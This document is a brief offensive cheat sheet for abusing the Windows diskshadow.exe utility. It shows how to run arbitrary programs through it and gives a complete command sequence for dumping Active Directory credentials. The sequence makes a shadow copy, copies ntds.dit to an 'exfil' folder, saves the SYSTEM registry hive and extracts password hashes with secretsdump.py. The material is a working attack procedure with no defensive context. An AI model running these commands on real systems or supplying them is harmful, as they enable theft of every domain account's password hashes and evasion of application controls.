diskshadow.txt

Execute
=======

*Interactive Mode

cmd.exe
c:\windows\system32\diskshadow.exe
> exec calc.exe
> exec "cmd.exe" /c calc.exe
> exit


*Script Mode

- Create a script (txt) file (e.g. diskshadow.txt)

exec calc.exe
exec notepad.exe

- Run Script

diskshadow.exe /s c:\test\diskshadow.txt


-----------------------
Extract AD DB
=============

- Create Sscript (diskshadow.txt)

set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
delete shadows volume %someAlias%
reset

- Run the Script

diskshadow.exe /s c:\diskshadow.txt

- Capture the System Registry Hive

reg.exe save hklm\system c:\exfil\system.bak

-Copy off the AD DB/System Hive and extract hashes with SecretsDump

secretsdump.py -ntds ntds.dit -system system.bak LOCAL